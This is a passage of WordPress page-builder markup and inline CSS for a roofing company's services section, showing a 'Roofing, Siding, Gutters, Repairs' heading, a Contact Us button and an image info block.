}\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"158f9bfc-d2b9-42eb-a8e5-6e47c7efa463\"} -->\n<style type=\"text/css\"> .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-158f9bfc-d2b9-42eb-a8e5-6e47c7efa463 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"a48ef254-6b43-4feb-8c98-8e16ec4b8e54\"} -->\n<style type=\"text/css\"> .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a48ef254-6b43-4feb-8c98-8e16ec4b8e54\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ef3dd585-c3d3-4834-b0d3-f1366fbd631e\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ef3dd585-c3d3-4834-b0d3-f1366fbd631e\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"fe4fc405-1b76-43db-8c2c-923bb96f2ab2\"} -->\n<style type=\"text/css\"> .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fe4fc405-1b76-43db-8c2c-923bb96f2ab2\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"ad526e6a-3ac5-4787-98b4-b4a08deb4fd3\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-ad526e6a-3ac5-4787-98b4-b4a08deb4fd3 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"9ccb550a-9017-4524-9954-a7be7540627b\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-9ccb550a-9017-4524-9954-a7be7540627b background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-9ccb550a-9017-4524-9954-a7be7540627b.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-9ccb550a-9017-4524-9954-a7be7540627b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-9ccb550a-9017-4524-9954-a7be7540627b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-9ccb550a-9017-4524-9954-a7be7540627b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-9ccb550a-9017-4524-9954-a7be7540627b.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-9ccb550a-9017-4524-9954-a7be7540627b .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9ccb550a-9017-4524-9954-a7be7540627b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9ccb550a-9017-4524-9954-a7be7540627b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-9ccb550a-9017-4524-9954-a7be7540627b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9ccb550a-9017-4524-9954-a7be7540627b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"dba5a57c-6107-4f82-a964-673588d98dce\"} -->\n<style type=\"text/css\"> .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-dba5a57c-6107-4f82-a964-673588d98dce .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-dba5a57c-6107-4f82-a964-673588d98dce skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"0b9e5611-3349-4218-a906-00718b0363e1\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0b9e5611-3349-4218-a906-00718b0363e1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"a975dbd0-6829-41b9-b61d-4e9684d440f4\"} -->\n<style type=\"text/css\"> .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 